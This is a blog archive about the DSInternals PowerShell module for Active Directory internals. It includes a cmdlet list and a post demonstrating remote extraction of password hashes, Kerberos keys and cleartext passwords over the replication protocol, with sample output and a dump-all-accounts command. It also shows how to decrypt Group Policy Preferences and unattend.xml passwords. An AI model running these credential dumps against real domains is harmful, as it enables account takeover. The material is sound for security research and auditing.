Directory Services Internals

List of Cmdlets in the DSInternals Module

September 29, 2015 | Michael Grafnetter | 18 Comments

Here is the list of cmdlets currently contained in the DSInternals PowerShell module:

Online operations with the Active Directory database

Get-ADReplAccount – Reads one or more accounts through the DRSR protocol, including secret attributes.
Set-SamAccountPasswordHash – Sets NT and LM hashes of an account through the SAMR protocol.
Get-ADReplBackupKey – Reads the DPAPI backup keys through the DRSR protocol.

Offline operations with the Active Directory database

Get-ADDBAccount – Reads one or more accounts from a ntds.dit file, including the secret attributes.
Get-BootKey – Reads the BootKey (aka SysKey) from an online or offline SYSTEM registry hive.
Set-ADDBBootKey – Re-encrypts a ntds.dit with a new BootKey. Highly experimental!
Get-ADDBBackupKey – Reads the DPAPI backup keys from a ntds.dit file.
Add-ADDBSidHistory – Adds one or more values to the sIDHistory attribute of an object in a ntds.dit file.
Set-ADDBPrimaryGroup – Modifies the primaryGroupId attribute of an object in a ntds.dit file.
Get-ADDBDomainController – Reads information about the originating DC from a ntds.dit file, including domain name, domain SID, DC name and DC site.
Set-ADDBDomainController – Writes information about the DC to a ntds.dit file, including the highest commited USN and database epoch.
Get-ADDBSchemaAttribute – Reads AD schema from a ntds.dit file, including datatable column names.
Remove-ADDBObject – Physically removes specified object from a ntds.dit file, making it semantically inconsistent. Highly experimental!

Views

The output of the Get-ADDBAccount and Get-ADReplAccount cmdlets can be formatted using these additional Views:

HashcatNT – NT hashes in Hashcat‘s format.
HashcatLM – LM hashes in Hashcat’s format.
JohnNT – NT hashes in the format supported by John the Ripper.
JohnLM – LM hashes in the format supported by John the Ripper.
Ophcrack – NT and LM hashes in Ophcrack‘s format.

Password hash calculation

ConvertTo-NTHash – Calculates NT hash of a given password.
ConvertTo-NTHashDictionary – Creates a hash->password dictionary for use with the Test-PasswordQuality cmdlet.
ConvertTo-LMHash – Calculates LM hash of a given password.
ConvertTo-OrgIdHash – Calculates OrgId hash of a given password. Used by Azure Active Directory Sync.

Password decryption

ConvertFrom-GPPrefPassword – Decodes a password from the format used by Group Policy Preferences.
ConvertTo-GPPrefPassword – Converts a password to the format used by Group Policy Preferences.
ConvertFrom-UnattendXmlPassword – Decodes a password from the format used in unattend.xml files.
ConvertTo-UnicodePassword – Converts a password to the format used in unattend.xml or *.ldif files.
ConvertFrom-ADManagedPasswordBlob – Decodes the cleartext password from a Group Managed Service Account (GMSA) object.

Miscellaneous

Test-PasswordQuality – Performs AD audit, including checks for weak, duplicate, default and empty passwords.
Save-DPAPIBlob – Saves the output of the Get-ADReplBackupKey and Get-ADDBBackupKey cmdlets to a file.
ConvertTo-Hex – Helper cmdlet that converts binary input to the hexadecimal string format.

I promise to publish more information about my cmdlets in the near future.

Tags: Active Directory, DPAPI, Microsoft Azure, Office 365, PowerShell, Security

Peeking into the Active Directory Database

September 28, 2015 | Michael Grafnetter | No Comments

During my recent talk about inner workings of Active Directory, I showcased the Esent Workbench tool, which can be used to look inside a ntds.dit file. But one must really have stomach for it.

Tags: Active Directory

New version of the DSInternals module released

September 5, 2015 | Michael Grafnetter | No Comments

I have released a new version of the DSInternals PowerShell module. This is mainly a bugfix release. You can grab it from the Downloads section. Or, if you have PowerShell 5, you can install the module from the PowerShell Gallery by running this command:

1	Install-Module -Name DSInternals

Tags: Active Directory, Microsoft Azure, PowerShell, Security

Retrieving Active Directory Passwords Remotely

August 4, 2015 | Michael Grafnetter | 130 Comments

I have finally finished work on the Get-ADReplAccount cmdlet, the newest addition to my DSInternals PowerShell Module, that can retrieve reversibly encrypted plaintext passwords, password hashes and Kerberos keys of all user accounts from remote domain controllers. This is achieved by simulating the behavior of the dcromo tool and creating a replica of Active Directory database through the MS-DRSR protocol. Furthermore, it has these properties:

It does not even need the Domain Admins group membership. The Replicating Directory Changes All permission is more than enough for this cmdlet to do its job.
It opens door to other attacks, e.g. pass-the-hash, pass-the-ticket or PAC spoofing, that can be used to seize control of the entire Active Directory forest. Long live mimikatz!
It cannot be effectively blocked by firewalls, because the directory replication service (the DRSGetNCChanges call to be more precise) shares the same port with other critical services, like user name resolution (exposed by the DsCrackNames call).
It only uses documented features of Active Directory and is not a hack per se.
It leaves only minimal footprint on Domain Conrollers and can be easily overlooked by security audits.

Usage example:

Import-Module DSInternals

$cred = Get-Credential

Get-ADReplAccount -SamAccountName April -Domain Adatum -Server LON-DC1 `

-Credential $cred -Protocol TCP

Sample output:

100

101

DistinguishedName: CN=April Reagan,OU=IT,DC=Adatum,DC=com

Sid: S-1-5-21-3180365339-800773672-3767752645-1375

Guid: 124ae098-699b-4450-a47a-314a29cc90ea

SamAccountName: April

SamAccountType: User

UserPrincipalName: April@adatum.com

PrimaryGroupId: 513

SidHistory:

Enabled: True

Deleted: False

LastLogon:

DisplayName: April Reagan

GivenName: April

Surname: Reagan

Description:

NTHash: 92937945b518814341de3f726500d4ff

LMHash: 727e3576618fa1754a3b108f3fa6cb6d

NTHashHistory:

Hash 01: 92937945b518814341de3f726500d4ff

Hash 02: 1d3da193d2f45911a6f0fa940b9fb32f

Hash 03: 402bc59d8a00641b7f386e78596340f4

LMHashHistory:

Hash 01: 727e3576618fa1754a3b108f3fa6cb6d

Hash 02: 5a5503d0e85f58abaad3b435b51404ee

Hash 03: f9393d97e7a1873caad3b435b51404ee

SupplementalCredentials:

ClearText: Pa$$w0rd

Kerberos:

Credentials:

DES_CBC_MD5

Key: 76fe3b5bda911a40

OldCredentials:

DES_CBC_MD5

Key: 7f8c4f38e0ea0b80

Salt: ADATUM.COMApril

Flags: 0

KerberosNew:

Credentials:

AES256_CTS_HMAC_SHA1_96

Key: 3a3b6a89bb82d112db5ef68f6db5d1afc2b806df61dcd85e3eacf3b85ee382d8

Iterations: 4096

AES128_CTS_HMAC_SHA1_96

Key: a72c8bc96c4a6f03244f0b0067a1e440

Iterations: 4096

DES_CBC_MD5

Key: 76fe3b5bda911a40

Iterations: 4096

OldCredentials:

AES256_CTS_HMAC_SHA1_96

Key: 14e46244a59a37cd8aa7c1fe61896441c7d065fafe4874191e69c1fe28856810

Iterations: 4096

AES128_CTS_HMAC_SHA1_96

Key: 034b512ec64286dec951d6aff8d81fa8

Iterations: 4096

DES_CBC_MD5

Key: 7f8c4f38e0ea0b80

Iterations: 4096

OlderCredentials:

AES256_CTS_HMAC_SHA1_96

Key: 2387ca8f936c8c154996809af8fee7c47fe4b9b5dd84d051fc43a9289bbaa3ab

Iterations: 4096

AES128_CTS_HMAC_SHA1_96

Key: 29d536ec057f9063747161429b81f056

Iterations: 4096

DES_CBC_MD5

Key: 58f1cbe6e50e1f83

Iterations: 4096

ServiceCredentials:

Salt: ADATUM.COMApril

DefaultIterationCount: 4096

Flags: 0

WDigest:

Hash 01: c3d012ab1101eb8f51b483fb4c5f8a7e

Hash 02: c993da396914645b356ae7816251fcb1

Hash 03: 6b58530cab34de91189a603e22c2be15

Hash 04: c3d012ab1101eb8f51b483fb4c5f8a7e

Hash 05: 5a762cf59fa31023dcba1ebd4725b443

Hash 06: c78bac91c0ba25cae5d44460fd65a73b

Hash 07: 59d73cea16afd1aac6bf8acfa2768621

Hash 08: d2be383db9469a39736d9e2136054131

Hash 09: 079de9f4d94d97a80f1726497dfd1cc2

Hash 10: 85dbe1549d5fbfcc91f7fe5ac5910f52

Hash 11: 961a36bded5535b8fc15b4b8e6c48b93

Hash 12: 6ac8a60d83e9ae67c2097db716a6af17

Hash 13: e899e577d5f81ef5288ab67de07fad9a

Hash 14: 135452ab86d40c3d47ca849646d5e176

Hash 15: a84c367eaa334d0a4cb98e36da011e0f

Hash 16: 61a458eb70440b1a92639452f0c2c948

Hash 17: 238f4059776c3575be534afb46be4ccf

Hash 18: 03ddf370064c544e9c6dbb6ccbf8f4ac

Hash 19: 354dd6c77ccf35f63e48cd5af6473ccf

Hash 20: 5f9800d734ebe9fb588def6aaafc40b7

Hash 21: 59aab99ebcddcbf13b96d75bb7a731e3

Hash 22: f1685383b0c131035ae264ee5bd24a8d

Hash 23: 3119e42886b01cad00347e72d0cee594

Hash 24: ebef7f2c730e17ded8cba1ed20122602

Hash 25: 7d99673c9895e0b9c484e430578ee78e

Hash 26: e1e20982753c6a1140c1a8241b23b9ea

Hash 27: e5ec1c63e0e549e49cda218bc3752051

Hash 28: 26f2d85f7513d73dd93ab3afd2d90cf6

Hash 29: 84010d657e6b58ce233fae2bd7644222

You could even dump all accounts at once, but this can cause heavy (=suspicious) replication traffic:

1	Get-ADReplAccount -All -NamingContext 'DC=Adatum,DC=com' -Server LON-DC1

Tags: Active Directory, PowerShell, Security

The DSInternals PowerShell Module has been released

February 28, 2015 | Michael Grafnetter | 4 Comments

I have decided to publish the DSInternals PowerShell Module, which contains a few cmdlets I use during my lectures about Active Directory security. You can find it in the Downloads section. It currently lacks any documentation, so Get-Help won’t give you nice results, but I am working on that.

Examples

Import-Module DSInternals

$pwd = ConvertTo-SecureString 'Pa$$W0rd' -AsPlainText -Force

# Calculate the NT and LM hashes

ConvertTo-NTHash $pwd

# Output: 92937945b518814341de3f726500d4ff

ConvertTo-LMHash $pwd

# Output: 727e3576618fa1754a3b108f3fa6cb6d

# Set AD account password hash using the SAMR protocol

Set-SamAccountPasswordHash -SamAccountName john -Domain ADATUM -NTHash '92937945b518814341de3f726500d4ff' -Server dc1.adatum.com

# Calculate the OrgId hash, that is sent to Azure Active Directory by DirSync

ConvertTo-OrgIdHash -NTHash '92937945b518814341de3f726500d4ff'

# Output: v1;PPH1_MD4,f76bc776428002f87f4b,100,0ab46c4a6351db87cc13323bb01eea073c90a52e376fffca559e57fbb19a441a;

# Decrypt a password from Group Policy Preferences

ConvertFrom-GPPrefPassword 'v9NWtCCOKEUHkZBxakMd6HLzo4+DzuizXP83EaImqF8'

# Output: Pa$$w0rd

# Decrypt a password from an unattend.xml file

ConvertFrom-UnattendXmlPassword 'UABhACQAJAB3ADAAcgBkAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAUABhAHMAcwB3AG8AcgBkAA=='

# Output: Pa$$w0rd

Error reporting

If you find an error in the DSInternals Powershell Module, I would be glad if you sent me an e-mail.

Planned features

I am currently working on these new features, but it will take me some time until they are production-ready:

~~Offline modification of the ntds.dit file, including the sIDHistory and primaryGroupID attributes.~~ Done
Attribute-level authoritative restore of AD objects
~~Remote export of account password hashes using the MS-DRSR protocol.~~ Done
Fully functional Get-Help
~~MSI installer.~~ Deprecated in favor of PowerShellGet.

Tags: Active Directory, Microsoft Azure, PowerShell

Welcome!

September 19, 2014 | Michael Grafnetter | No Comments

Welcome to my new blog about undocumented features of Active Directory. Unfortunately, most of the content is currently in Slovak/Czech only, but I will try to translate some of the more interesting things into English.